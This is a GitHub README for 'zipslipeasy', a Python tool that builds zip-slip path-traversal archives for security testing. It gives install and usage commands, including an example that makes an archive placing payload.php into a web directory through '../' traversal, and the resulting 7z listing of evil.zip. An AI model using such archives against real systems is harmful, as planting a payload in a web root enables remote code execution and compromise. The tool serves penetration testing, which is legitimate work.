zipslipeasy (zse)

zse automates the creation of zipslip exploits for testing purposes, saving you from the hassle of manually crafting them.

requirements

python 3
7z (must be in your system's PATH)

installation

git clone https://github.com/ph5i/zse.git
cd zse
python3 zse.py -h

example usage

to traverse up 5 directories and place the payload in the /var/www/foo/bar directory, run:

python3 zse.py -d 5 -t var/www/foo/bar payload.php

this will result in a zip archive that, when extracted, places the payload.php file in the /var/www/foo/bar directory.

7z l evil.zip
[...]
   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2025-04-25 09:35:21 .....            5            5  ../../../../../var/www/foo/bar/payload.php
------------------- ----- ------------ ------------  ------------------------
[...]

license

this tool is licensed under the MIT license.

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md
zse.py		zse.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

zipslipeasy (zse)

requirements

installation

example usage

license

About

Uh oh!

Releases 1

Packages

Languages

ph5i/zse

Folders and files

Latest commit

History

Repository files navigation

zipslipeasy (zse)

requirements

installation

example usage

license

About

Topics

Resources

Uh oh!

Stars

Watchers

Forks

Releases 1

Packages 0

Languages

Packages